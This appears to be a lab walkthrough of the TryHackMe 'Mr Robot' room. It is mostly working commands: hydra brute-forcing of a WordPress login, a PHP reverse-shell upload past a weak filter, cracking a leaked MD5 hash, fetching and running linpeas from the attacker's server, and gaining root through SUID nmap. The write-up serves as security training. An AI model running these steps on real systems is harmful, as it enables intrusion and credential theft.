TryHackMe room link: https://tryhackme.com/room/mrrobot
Nmap initial scan
nmap -sC -sV <ip> | tee nmap.initial
Website
There is a terminal-themed page.
Check robots.txt and sitemap.xml.
We find our first flag and fsocity.dic. Download fsocity.dic.
fsocity.dic file
It seems to be a dictionary file.
Gobuster
gobuster dir -w directory-list-2.3-medium.txt -u http://<ip> -x php,js
Gobuster finds /wp-login, /wp-includes… so it is probably a WordPress site. Check /login.
WP Login
We found a login page. We can try a dictionary attack with the fsocity.dic file to find the username.
Username Dictionary Attack
We have to find:
- the error message shown when a wrong username is entered
- the POST data parameters
1. Try to log in with a dummy string. The error message is "Invalid username".
2. You can do that using Burp, but I'll use the browser: open Developer Tools > Network > Reload > POST > Request. The POST parameters are log="username"&pwd="dumbstring".
Okay, now we can run hydra with this information.
hydra -L fsocity.dic -p temp <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" -f -t 40
- -L : username list
- -p : password
- -f : stop on success
- -t : threads
The module string http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" breaks down as:
- /wp-login.php : our login page route
- log=^USER^&pwd=^PASS^ : the POST parameters, with ^USER^ and ^PASS^ replaced by hydra on each attempt
- F=<str> : the string that marks a failed login
We found username “Elliot”.
Password Dictionary Attack
Now that we have the username, log in with a dummy password to find the failure string, then run hydra against the password list.
hydra -l Elliot -P fsocity.dic <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you" -t 16
Wait a bit and get the password. Log in with the credentials.
wp-admin
There is a media upload section. Maybe we can upload an arbitrary file.
Set up a PHP reverse shell
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
nano shell.php
Enter your IP and local port, then save the file.
Create a netcat listener in a new tab.
nc -lvnp 8080
Let's try to upload it.
We got an upload filter error.
First, we can try renaming the file to bypass the filter.
cp shell.php shell.png
Try the upload again.
It worked. Luckily for us, the filter was very insecure.
Go to the file URL, remove .png and press enter.
Initial Access
We got a shell. Stabilize it.
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + Z
stty raw -echo; fg
User Privesc
Now we are the daemon user. Let's check /home.
There is a user named "robot". In /home/robot there is a password.raw-md5 file whose content we can read.
robot:c3fcd3d76192e4007dfb496cca67e13b
Judging by the file name, this is a raw MD5 hash. First, we can try CrackStation to crack it.
We cracked the hash. Log in as robot.
su robot
We are robot now and can read flag 2.
Privesc
Download linpeas.sh to your attacker machine.
cd /tmp; wget https://github.com/carlospolop/PEASS-ng/releases/download/20230702-bc7ce3ac/linpeas.sh
Set up a Python HTTP server.
python3 -m http.server 1337
Go to the Mr. Robot machine and download linpeas from the attacker machine. Give it execute (x) permission and run it, piping through tee to save the output.
cd /tmp; wget http://<ip>:1337/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.out
There is an nmap binary with the SUID bit set. We can go to GTFOBins and search for nmap.
Simply create an interactive shell using nmap.
/usr/local/bin/nmap --interactive
nmap> !sh
We are root.